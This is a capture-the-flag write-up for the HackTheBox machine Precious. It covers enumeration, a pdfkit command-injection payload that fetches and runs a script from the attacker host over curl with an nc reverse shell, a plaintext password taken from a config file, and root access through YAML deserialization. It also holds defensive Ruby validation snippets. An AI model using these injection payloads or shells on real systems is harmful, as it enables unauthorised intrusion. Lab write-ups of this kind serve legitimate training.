Precious

#Linux #Enumeration #Command-Injection

Precious is an easy-rated Linux machine from HackTheBox created by Nauten. This machine is straightforward and does not have any rabbit holes or hard-to-find information, but you still need to do good research because the exploit is a little uncommon. In this post, my IP is 10.10.14.76 and the target's IP is 10.129.49.93.

Gather Information

This step is always the same: ping the machine to see if it is alive, then use Nmap to scan all the ports to avoid surprises.

Local Terminal
ping -c 1 10.129.49.93
Ping's output: a TTL around 64 indicates a Linux machine
Local Terminal
nmap -p- --open -T5 -v -n 10.129.49.93
Nmap’s output
Local Terminal
nmap -sC -sV -p 22,80 10.129.49.93

At this point, we know there is only a website, but we still need more details before trying anything.

Local Terminal
whatweb http://10.129.49.93
Relevant information {Domain = precious.htb}

Add that domain to your file /etc/hosts

  • Browser: http://10.129.49.93

Website main page

There is nothing special about this site. One of the best options before interacting with the "Web Page to PDF" form is running wfuzz to look for hidden paths.

Local Terminal
wfuzz -c -t 200 --hc=404 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt http://10.129.49.93/FUZZ

Spoiler, no results.

  • Browser: Submit http://precious.htb

OK, nothing happens with its own URL, so let's open a simple http.server with Python to see how the site reacts to it. The result does not change whether or not you have an index.html file.

Local Terminal
python3 -m http.server 80
  • Browser: Submit http://10.10.14.76:80/

Website before submit
Content from index.html... as a .pdf file.

The output is a simple PDF file, nothing suspicious, and using only the textbox there is no way to get a response from bash commands, so let's check the metadata.

Local Terminal
exiftool output.pdf
output from exiftool, nothing suspicious

Weaponization and Exploitation

If you search for "pdfkit v0.8.6 exploit" you will find a critical command injection vulnerability. We will use that to get access to the machine. (https://security.snyk.io/vuln/SNYK-RUBY-PDFKIT-2869795)

Exploit structure from the code, by security.snyk

As we can see, we only have to change the content of params[:name] in the URL to execute a command. To test whether this really works, open a local terminal, run tcpdump -i eth0 icmp (to check your interface name, use ifconfig), and submit in the browser http://10.10.14.76:80/?name=#{'%20`ping -c 1 10.10.14.76 | bash`'}.
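As an added defensive example (not pdfkit's own code nor its fix), this Ruby check shows the kind of validation that keeps a user-supplied URL from ever reaching a shell-built command; the function names and the argv shape are assumptions for illustration.

```ruby
# Added example (not pdfkit's code): the input check a PDF-rendering service
# should apply before a user-supplied URL reaches a shell-built command.
# pdfkit 0.8.6 interpolated the URL into a shell string, so characters such as
# backticks, `|` and `#{...}` could break out into command execution.
require "uri"

# Characters that have meaning to a POSIX shell or to Ruby string interpolation.
SHELL_META = /[`|;&$<>(){}\\'"\s]/

# Return the URL unchanged when it is a plain http(s) URL with no shell
# metacharacters; return nil otherwise so the caller can reject the request.
def safe_render_url(raw)
  return nil if raw.nil? || raw.match?(SHELL_META)
  uri = URI.parse(raw)
  return nil unless %w[http https].include?(uri.scheme) && uri.host
  uri.to_s
rescue URI::InvalidURIError
  nil
end

# Build the renderer invocation as an argv array (hypothetical wrapper).
# Passing an array to Process.spawn/system bypasses /bin/sh entirely, so a
# URL can never be parsed as a second command.
def render_argv(raw, out_path)
  url = safe_render_url(raw)
  return nil unless url
  ["wkhtmltopdf", "--quiet", url, out_path]
end
```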

After the test we know it is working and we can create a reverse shell. For this we need two local terminals and an index.html file with a bash command inside.

Local Terminal 1
vi index.html
python3 -m http.server 80
Content of index.html
Local Terminal 2
nc -nlvp 443
  • Browser: Submit http://10.10.14.76:80/?name=#{'%20`curl 10.10.14.76 | bash`'}

LocalTerm2, now connected as the user ruby

You can close LocalTerm1; LocalTerm2 is now the target command prompt, called "Target" from here on. After this, a good practice is to upgrade the shell to a proper TTY.

Target folder exploration, searching for user.txt

It looks like only henry can open the user flag, so we need to gain his privileges, and for that we need to find any important file that could contain his credentials, such as config files.

So our best option at this moment is to return to /home and check whether our account, ruby, has something in its personal folder. At first glance there is nothing there, but if you show hidden files you can see more.

Target Terminal
cd /home/
ls -l ./ruby
ls -la ./ruby
Folder ruby

But there are many folders…

Target Terminal
find -name "*config*"
Search for every config file inside the ruby folder, a usual location for credentials.
Target Terminal
cat ./ruby/.bundle/config
Content of the .bundle/config file: Henry's password.

Our best option now is to open a new LocalTerm and try to log in over SSH with these credentials {henry@Q3c1AqGHtoI0aXAYFH}

Local Terminal
ssh henry@10.129.49.93
LocalTerm after login

We are in. Your LocalTerm is now Henry's session; let's go to his folder and open the file user.txt.

Target Terminal - Henry
cd /home/henry
cat user.txt
First flag acquired

Privilege Escalation

Target Terminal - Henry
cd /root/

Now we need to get the credentials of root.

Target Terminal - Henry
sudo -l
command's output

It looks like, as henry, we can execute that .rb file as root without a password.

Target Terminal - Henry
cat /opt/update_dependencies.rb
Code of “update_dependencies.rb”

At first glance, we can see that it reads a file called "dependencies.yml"; we can use that to our advantage.

Target Terminal - Henry
find -name "dependencies.yml"
cat ./sample/dependencies.yml

Nothing important in the content, but there is an attack called YAML deserialization (it took me a lot of time to find it) that can be used here, by creating a new dependencies.yml file with this code. Remember to create the new dependencies.yml in Henry's folder, because that is where you have write permission.

New dependencies.yml’s code
Target Terminal - Henry
sudo /usr/bin/ruby /opt/update_dependencies.rb

Now we have to make a modification to the dependencies.yml file and then run the previous command again.

Location of the modification
Target Terminal - Henry
sudo /usr/bin/ruby /opt/update_dependencies.rb
/bin/bash -p

After running the command again, we change from Henry to root; now we have permission to read the /root/ folder.
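As an added example (not the code of /opt/update_dependencies.rb, which is only shown as a screenshot above), this Ruby snippet shows why a script that parses a YAML file with the unsafe loader can be abused through object tags, the safe_load form that rejects them, and a path check for the sudo case; the class name, file contents and function names are constructed placeholders.

```ruby
# Added example (not the machine's update_dependencies.rb). Psych's unsafe
# loader honours tags such as !ruby/object:SomeClass and instantiates
# arbitrary Ruby objects from the file; safe_load only builds plain data
# types (Hash, Array, String, numbers) unless a class is explicitly permitted.
require "yaml"

# Constructed sample: the benign shape a dependencies file is expected to have.
BENIGN_YAML = <<~EOS
  dependencies:
    - name: pdfkit
      version: "0.8.6"
EOS

# Constructed sample: a document carrying an object tag for a made-up class.
# The class name is a placeholder; the point is that the tag itself is rejected.
TAGGED_YAML = <<~EOS
  --- !ruby/object:PlaceholderClass
  attr: value
EOS

# Load a dependencies file without instantiating any Ruby objects.
# Returns [:ok, data] for plain data, [:rejected, message] for tagged input.
def load_dependencies(text)
  data = YAML.safe_load(text, permitted_classes: [], aliases: false)
  [:ok, data]
rescue Psych::Exception => e
  [:rejected, e.message]
end

# Extra layer for the sudo case: a privileged script should only read a file
# under a root-owned directory, never one resolved from the caller's cwd, so a
# planted dependencies.yml in a user's home is never opened.
def trusted_path?(path, trusted_root)
  File.expand_path(path).start_with?(File.expand_path(trusted_root) + "/")
end
```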

Target Root
cd /root/
Target Root
cat root.txt
System flag
